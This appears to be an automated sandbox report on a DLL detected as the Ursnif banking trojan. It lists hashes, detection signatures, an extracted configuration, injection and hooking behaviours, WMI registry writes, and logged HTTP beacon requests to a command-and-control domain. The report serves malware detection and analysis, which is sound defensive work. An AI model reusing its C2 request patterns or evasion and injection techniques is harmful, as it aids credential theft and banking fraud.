Analysis Report yytr.dll

Overview

General Information

Sample Name: yytr.dll
Analysis ID: 350433
MD5: ba2befa9c70c2b6d779c48a59cece3e5
SHA1: 4c855f80076e357d35c7d60cd52d2c49abefc5ff
SHA256: 9c51cbe4681facc34623aeca27a18dbaa6db1337990a0e003b7c9babeb06c1eb

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Contains functionality to detect sleep reduction / modifications
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to get notified if a device is plugged in / out
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains strange resources
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

barindex
Found malware configuration
Source: loaddll32.exe.5964.0.memstr Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@618321hh", "dns": "618321", "version": "250177", "uptime": "372", "crc": "2", "id": "3131", "user": "4229768108f8d2d8cdc8873a70351dbe", "soft": "3"}
Multi AV Scanner detection for submitted file
Source: yytr.dll Virustotal: Detection: 43% Perma Link
Source: yytr.dll ReversingLabs: Detection: 39%
Machine Learning detection for sample
Source: yytr.dll Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.loaddll32.exe.f50174.3.unpack Avira: Label: TR/Kazy.4159236
Source: 1.2.rundll32.exe.4520174.4.unpack Avira: Label: TR/Kazy.4159236

Compliance:

barindex
Uses 32bit PE files
Source: yytr.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 104.16.249.249:443 -> 192.168.2.4:49794 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: powrprof.pdbG source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000004.00000003.646924434.0000000003165000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.pdb source: powershell.exe, 0000001E.00000002.910551161.0000026F5EBFA000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: version.pdb{ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000004.00000003.646920068.000000000315F000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb} source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: combase.pdbQ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000021.00000002.845354069.000001CB4A4D0000.00000002.00000001.sdmp, csc.exe, 00000023.00000002.855076730.000002D3EE650000.00000002.00000001.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdbM source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdbe source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000004.00000003.646920068.000000000315F000.00000004.00000001.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: shell32.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdbc source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.pdbXPS source: powershell.exe, 0000001E.00000002.910551161.0000026F5EBFA000.00000004.00000001.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.863977808.0000000005670000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb_ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdbi source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdbGX source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdbm source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.pdbXPS source: powershell.exe, 0000001E.00000002.910665056.0000026F5EC2E000.00000004.00000001.sdmp
Source: Binary string: sechost.pdbw source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbK source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.pdb source: powershell.exe, 0000001E.00000002.910375555.0000026F5EBB6000.00000004.00000001.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000004.00000003.647057880.000000000316B000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.863977808.0000000005670000.00000004.00000001.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000004.00000003.646924434.0000000003165000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: comctl32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp

Spreading:

barindex
Contains functionality to get notified if a device is plugged in / out
Source: C:\Windows\explorer.exe Code function: 37_2_04DB9064 RegisterDeviceNotificationA, 37_2_04DB9064
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_004051E8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_004051E8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F37AA8 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_02F37AA8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_004051E8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 1_2_004051E8
Source: C:\Windows\explorer.exe Code function: 37_2_04DBA0C4 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, 37_2_04DBA0C4
Source: C:\Windows\explorer.exe Code function: 37_2_04DBEEAC FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW, 37_2_04DBEEAC
Source: C:\Windows\explorer.exe Code function: 37_2_04DB537C FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindClose,RtlDeleteBoundaryDescriptor,RtlReleasePrivilege, 37_2_04DB537C

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 45.67.231.135: -> 192.168.2.4:
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SERVERIUS-ASNL SERVERIUS-ASNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c
Source: C:\Windows\explorer.exe Code function: 37_2_04DB2690 InternetReadFile, 37_2_04DB2690
Source: global traffic HTTP traffic detected: GET /manifest/0Ru5_2BN/vJgRf6V8sbRC064gj9umjfq/qGksViZKyK/CLTbbr_2Frwl7IIUm/2WgRCjkUmuV8/iqgLjW1thwy/gJZQmwxnV_2BDM/Wr8pQO7reeN1b6Kt1HCeS/XjNtvAuY9ME_2BeN/LgpsYgJYXFXyrGm/d7KSfhzGcV8NWQ7ppv/9EulZOHC5/KtUCLTDeST800go2ZMVb/VjoLNr.snx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: pronpepsipirpyamvioerd.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: pronpepsipirpyamvioerd.comConnection: Keep-AliveCookie: PHPSESSID=eshdo6go4uelgf2o7eta3f2t14; lang=en
Source: global traffic HTTP traffic detected: GET /manifest/NYuAqVunzg8xaQkjvT46w/1VWG9VjwQgEgBMZm/Edmv_2B8LPKApUf/y1_2FkkZHFAdOsdYZs/d_2Fil_2B/2sLNxYxtzdQxXGXvTOBx/XjwkkSX2ErFOwgwZnhQ/X4rzMPZ_2BQqzPEaol9dkp/NXUXbdRpfvyEv/malx3f_2/F5Dcl9KMBZOba09lPIsxEXU/75awVY4snO/mAGP3ya11/S.snx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: pronpepsipirpyamvioerd.comConnection: Keep-AliveCookie: lang=en
Source: global traffic HTTP traffic detected: GET /manifest/B6BYv9zhM9/Ha3CHkPLo3mXozKfC/o_2FE8j69Cu2/vMtBWo7v_2B/K717OxVgHzGizO/XIuLXZu8qkAN2wMJkptv8/1QwAgfct_2FjngCz/DuCEjb4kUB5NNhB/qR0_2FpSaJDi7blpKM/fBK5rghxV/R_2BqBsae2XxsQIQFD_2/FNGXxVdkHEUOrk_2FKw/pFfmknmoACymtAa0UoGCEX/7h.snx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: pronpepsipirpyamvioerd.comConnection: Keep-AliveCookie: lang=en
Source: unknown DNS traffic detected: queries for: assets.onestore.ms
Source: loaddll32.exe, powershell.exe, 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, powershell.exe, 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 0000001E.00000003.825326086.0000026F5A0BB000.00000004.00000001.sdmp String found in binary or memory: http://crl.micr
Source: WerFault.exe, 00000004.00000003.659243979.0000000005012000.00000004.00000001.sdmp String found in binary or memory: http://crl.microsoft
Source: loaddll32.exe, 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.880565935.0000000001060000.00000040.00000001.sdmp, powershell.exe, 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001E.00000002.894782181.0000026F5BCBE000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001E.00000002.894428484.0000026F5BAB1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001E.00000002.894782181.0000026F5BCBE000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001E.00000002.894782181.0000026F5BCBE000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown HTTPS traffic detected: 104.16.249.249:443 -> 192.168.2.4:49794 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.704190908.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704338669.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.881249179.0000000000146000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.804269082.0000000004B5C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704231467.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704303673.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.1038694426.0000027D4F836000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704163545.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.880565935.0000000001060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1047039764.0000000004DD6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.868598752.000001EB11270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704264515.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704123248.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.877735219.00000000030F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704325242.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5964, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4552, type: MEMORY
Contains functionality to record screenshots
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_004225C8 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette, 1_2_004225C8
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00449950 GetKeyboardState, 0_2_00449950

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.704190908.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704338669.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.881249179.0000000000146000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.804269082.0000000004B5C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704231467.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704303673.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.1038694426.0000027D4F836000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704163545.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.880565935.0000000001060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1047039764.0000000004DD6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.868598752.000001EB11270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704264515.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704123248.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.877735219.00000000030F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704325242.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5964, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4552, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

barindex
Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0044C8CC NtdllDefWindowProc_A,GetCapture, 0_2_0044C8CC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0042863C NtdllDefWindowProc_A, 0_2_0042863C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0044281C GetSubMenu,SaveDC,RestoreDC,72E7B080,SaveDC,RestoreDC,NtdllDefWindowProc_A, 0_2_0044281C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00439348 NtdllDefWindowProc_A, 0_2_00439348
